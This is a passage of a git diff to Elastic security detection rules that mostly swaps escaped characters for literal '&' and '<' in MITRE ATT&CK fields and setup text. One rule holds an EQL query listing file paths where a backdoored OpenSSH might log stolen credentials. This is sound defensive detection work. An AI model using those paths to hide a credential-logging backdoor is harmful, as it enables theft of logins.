"MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json b/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json index 6eebfd887d8..65123ada884 100644 --- a/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json 
+++ b/packages/security_detection_engine/kibana/security_rule/f243fe39-83a4-46f3-a3b6-707557a102df_1.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -72,7 +72,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json
index 83d45fbf63e..c3c59281b0f 100644
--- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_103.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json
index 0910bf1cbdf..f9b68621d35 100644
--- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_104.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json
index 6be47f2351a..6281a8d2e82 100644
--- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_105.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -71,7 +71,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -93,7 +93,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json
index 768cf4c985c..e7d8bb74250 100644
--- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_106.json
@@ -43,7 +43,7 @@
 ],
 "risk_score": 47,
 "rule_id": "f24bcae1-8980-4b30-b5dd-f851b055c9e7",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -55,7 +55,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -70,7 +70,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json
index bee11c3a19e..00c9d7b240c 100644
--- a/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f24bcae1-8980-4b30-b5dd-f851b055c9e7_107.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -69,7 +69,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json
index 868ac7a53fb..0580939e31d 100644
--- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_103.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json
index 62517ef2160..95c59b5e056 100644
--- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_104.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -89,7 +89,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json
index 97a874b5616..81976e79764 100644
--- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_105.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -90,7 +90,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json
index 0f1069712d8..32974318821 100644
--- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_106.json
@@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential OpenSSH Backdoor Logging Activity", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"change\" and process.executable : (\"/usr/sbin/sshd\", \"/usr/bin/ssh\") and\n (\n (file.name : (\".*\", \"~*\", \"*~\") and not file.name : (\".cache\", \".viminfo\", \".bash_history\")) or\n file.extension : (\"in\", \"out\", \"ini\", \"h\", \"gz\", \"so\", \"sock\", \"sync\", \"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\") or\n file.path :\n (\n \"/private/etc/*--\",\n \"/usr/share/*\",\n \"/usr/include/*\",\n \"/usr/local/include/*\",\n \"/private/tmp/*\",\n \"/private/var/tmp/*\",\n \"/usr/tmp/*\",\n \"/usr/share/man/*\",\n \"/usr/local/share/*\",\n \"/usr/lib/*.so.*\",\n \"/private/etc/ssh/.sshd_auth\",\n \"/usr/bin/ssd\",\n \"/private/var/opt/power\",\n \"/private/etc/ssh/ssh_known_hosts\",\n \"/private/var/html/lol\",\n \"/private/var/log/utmp\",\n \"/private/var/lib\",\n 
\"/var/run/sshd/sshd.pid\",\n \"/var/run/nscd/ns.pid\",\n \"/var/run/udev/ud.pid\",\n \"/var/run/udevd.pid\"\n )\n )\n", "references": [ "https://github.com/eset/malware-ioc/tree/master/sshdoor", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json index 2895ddabcd5..0d217c42b63 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_107.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json index fa4c2445ea0..32c0312b7ad 100644 --- a/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json +++ b/packages/security_detection_engine/kibana/security_rule/f28e2be4-6eca-4349-bdd9-381573730c22_108.json 
@@ -61,7 +61,7 @@ ], "risk_score": 73, "rule_id": "f28e2be4-6eca-4349-bdd9-381573730c22", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
